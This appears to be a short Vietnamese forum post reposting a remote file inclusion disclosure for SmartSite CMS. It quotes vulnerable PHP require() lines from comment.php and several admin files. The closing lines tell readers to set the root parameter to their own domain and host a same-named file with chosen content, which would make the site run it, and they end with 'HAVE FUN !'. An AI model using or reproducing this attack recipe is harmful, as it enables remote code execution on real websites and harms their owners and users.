Lại là Remote File include. Xem chừng các programmer ngoại cũng lởm khởm ghê
Discovered By CrAsh_oVeR_rIdE
Arabian Security Team
site of script:www.smartsitecms.net
Code:
1-in comment.php :
require($root . "include/inc_foot.php");
---------------------------------------
2-in /admin/comedit.php :
else
{
require('../include/inc_accessfail.php');
}
?>
</div>
</div>
<?php
}
else {
require($root . "include/inc_adminfail.php");
}
---------------------------------------
3-in /admin/test.php :
require($root . "include/inc_adminfooter.php");
---------------------------------------
4-in /admin/index.php :
require($root . "admin/include/inc_adminfooter.php");
---------------------------------------
5-in /admin/include/inc_adminfoot.php:
require($root . "include/inc_footer.php");
---------------------------------------
Đến đây đã quá rõ. Chỉ cần ?root=http://mydomain.com và tạo include với file tương tự nhưng nội dung thì . . .
HAVE FUN !